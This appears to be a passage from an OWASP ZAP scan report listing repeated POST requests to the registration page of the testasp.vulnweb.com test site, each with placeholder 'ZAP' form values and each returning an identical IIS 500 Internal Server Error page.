HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
